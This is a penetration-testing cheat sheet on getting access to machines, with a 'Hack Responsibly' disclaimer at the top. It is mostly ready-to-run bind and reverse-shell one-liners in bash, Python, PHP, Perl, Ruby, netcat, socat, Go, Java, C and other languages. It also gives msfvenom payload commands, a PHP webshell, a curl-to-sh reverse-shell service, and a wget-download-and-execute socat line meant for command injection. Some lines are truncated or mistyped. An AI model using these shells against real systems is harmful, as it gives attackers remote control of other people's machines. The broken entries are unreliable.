Getting Access

Hack Responsibly.

Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.

TODO: description, methodology, and script prep for each section (issue #15)

• Add description and methodology as needed for each section

• Prep all code examples for scripting (replace IPs and ports with variables, etc.)

• Ensure code examples' variables are appropriate for their respective programming language

Bind shells

Bind shells are used when the attacker connects directly to the victim.

socat

socat - TCP4:$victim_ip:$port

The dash - is required to transfer keyboard data back and forth between the machines.

Encrypted bind shell

To create an encrypted bind shell, first a self-signed certificate must be created. It must either be created on the victim machine, or transferred prior to using the bind shell.

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 365 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem

This command will create a new 2048-bit encryption key and certificate using the RSA algorithm. The certificate will be valid for 365 days. The key and certifcate information must be combined into one .pem file using cat.

Next, use socat to create the bind shell using this .pem certificate. verify=0 will be used to disable SSL verification. Since you are using SSL on port 443 you need to run the listener with sudo if the victim machine is running Linux.

#listener on victim
socat.exe OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:"C:\Windows\System32\cmd.exe"
#attacker client
socat - OPENSSL:$IP:443,verify=0

Reverse Shells

Reverse shells are used when the attacker gets the victim machine to connect back to their machine. Useful when firewalls or other security devices prevent bind shells.

Reverse Shell as a Service - https://shell.now.sh

https://github.com/lukechilds/reverse-shell

curl https://shell.now.sh/<ip>:<port> | sh

Bash Reverse Shells

TCP:

bash -i >& /dev/tcp/192.168.1.2/4444 0>&1

UDP:

sh -i >& /dev/udp/192.168.1.2/5555 0>&1

exec Reverse Shell

0<&196;exec 196<>/dev/tcp/$ip/$port; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/$ip/$port && while read line 0<&5; do $line 2>&5 >&5; done

Python Reverse Shells

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.57",8099));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

export RHOST="192.168.1.2";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Using Socat UDP Listener

python -c 'import socket,pty,os;lhost = "10.10.15.80"; lport = 100; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv("HISTFILE",'/dev/null'); pty.spawn("/bin/bash"); s.close();

#UDP Socat Listener
socat file:`tty`,echo=0,raw  udp-listen:100

PHP Reverse Shell

php -r '$sock=fsockopen("192.168.1.2",80);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("192.168.1.2",4444);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

PHP command injection webshell:

<?php system($_GET['variable_name']); ?>

Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("192.168.1.2",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Telnet Reverse Shells

mknod backpipe p && telnet $ip $port 0<backpipe | /bin/bash 1>backpipe

telnet $ip $port1 | /bin/bash | telnet $ip $port2

rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.2 4444 0/tmp/p

Netcat Reverse Shells

nc -e /bin/sh 192.168.1.2 80

rm -f /tmp/p; mknod /tmp/p p && nc 192.168.1.2 4444 0/tmp/p

rm -f /var/tmp/backpipe 
mknod /var/tmp/backpipe p
nc $attack_ip $port 0</var/tmp/backpipe | /bin/bash 1>/var/tmp/backpipe

Socat Reverse Shell

socat tcp-connect:$IP:$port exec:"bash -li",pty,stderr,setsid,sigint,sane

#Listener on attacker machine
socat -d TCP-LISTEN:$port file:`tty`,raw,echo=0 
#From victim
socat TCP4:$IP:$port exec:'/bin/bash -li',pty,stderr,setsid,sigint,sane 

-d increases verbosity of output

Golang Reverse Shell

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.1.2:4444");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

Perl Reverse Shell

perl -e 'use Socket;$i="192.168.1.2";$p=8081;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<IP>:<PORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Awk Reverse Shell

awk 'BEGIN {s = "/inet/tcp/0/192.168.1.2/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

NodeJS Reverse Shell

require('child_process').exec('nc -e /bin/sh 192.168.1.2 4444')

JavaScript Reverse Shell

(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(LPORT, "LHOST", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })();

Java Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

C Reverse Shell

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include <unistd.h>

int main ()

{
const char* ip = "192.168.1.2";
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(4444);
inet_aton(ip, &addr.sin_addr);
int sockfd = socket(AF_INET, SOCK_STREAM, 0);
connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
for (int i = 0; i < 3; i++)
{
dup2(sockfd, i);
}
execve("/bin/sh", NULL, NULL);
return 0;
}

XTERM Reverse Shell

# Start an open X Server on your system (:1 – which listens on TCP port 6001)
apt-get install xnest
Xnest :1

# Then remember to authorise on your system the target IP to connect to you
xterm -display 127.0.0.1:1

# Run this INSIDE the spawned xterm on the open X Server
xhost +targetip

# Then on the target connect back to the your X Server
xterm -display attackerip:1
/usr/openwin/bin/xterm -display attackerip:1
or
$ DISPLAY=attackerip:0 xterm

Meterpreter Reverse Shells

• Linux Non-Staged reverse TCP

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf >reversetcp.elf

• Linux Staged reverse TCP

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf >reversetcp.elf

Upgrading remote shells

After catching a shell through netcat, you are placed in a shell that has very limited functionality. If the remote machine has python or python3 installed you can easily upgrade to a fully functional TTY shell.

Note: To check if the shell is a TTY shell use the tty command.

Upgrade to fully interactive shell (python example):

#On victim machine
python -c 'import pty;pty.spawn("/bin/bash")'; #spawn python psuedo-shell
ctrl-z #send to background

#On attacker's machine
stty raw -echo #https://stackoverflow.com/questions/22832933/what-does-stty-raw-echo-do-on-os-x
stty size #get local number of rows & columns
fg #to return shell to foreground

#On victim machine
export SHELL=bash
stty rows $x columns $y #Set remote shell to x number of rows & y columns
export TERM=xterm-256color #allows you to clear console, and have color output

When using some shells such as zsh or fish on the attacking machine your shell will break after you try to upgrade it using this method. Some of the things I have found that help mitigate this are:

1. Use rlwrap nc -lvnp when setting up your listener,

2. make sure not to put a space in your python pty command after the import,

3. type stty size;stty raw -echo;fg all on one line.

Finally, as a last resort, you could just switch to bash instead when setting up your nc listener.

Other Languages:

echo os.system('/bin/bash')
/bin/sh -i

#python3
python3 -c 'import pty; pty.spawn("/bin/sh")'

#perl
perl -e 'exec "/bin/sh";'

#ruby
exec "/bin/sh"
ruby -e 'exec "/bin/sh"'

#lua
lua -e "os.execute('/bin/sh')"

Using "Script" to upgrade to a TTY

Upgrade from a basic shell to a bash TTY using script.

SHELL=/bin/bash script -q /dev/null

Using “Expect” To Get A TTY

If you’re lucky enough to have the Expect language installed just a few lines of code will get you a good enough TTY to run useful tools such as “ssh”, “su” and “login”.

#Create a script called `sh.exp`

#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact

Using socat

Another option is to upload the binary for socat to the victim machine and magically get a fully interactive shell. Download the appropriate binaries from https://github.com/andrew-d/static-binaries. Socat needs to be on both machines for this to work.

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.15.100:4444

socat one-liner

This one-liner can be injected wherever you can get command injection for an instant reverse shell. Point the path to the binary to your local http server if internet access is limited on the victim.

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /dev/shm/socat; chmod +x /dev/shm/socat; /dev/shm/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.15.100:4444

Misc unsorted

bash -i >& /dev/tct/10.10.14.148/9001 0>&1

#URL encoded: 
bash+-i+>%26+/dev/tcp/10.10.14.148/9001+0>%261

Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

• Works more reliably when prefixed with bash -c (thanks Ippsec!)

bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'

PERL

Here’s a shorter, feature-free version of the perl-reverse-shell:

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

There’s also an alternative PERL revere shell here. (broken link?)

Python

This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

If you want a .php file to upload, see the more featureful and robust php-reverse-shell.

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.

nc -e /bin/sh 10.0.0.1 1234

If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.

xterm -display 10.0.0.1:1

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):

Xnest :1

You’ll need to authorize the target to connect to you (command also run on your host):

xhost +targetip

Resources

• http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

• http://pentestmonkey.net/blog/post-exploitation-without-a-tty

• https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html

• https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

If you like this content and would like to see more, please consider buying me a coffee!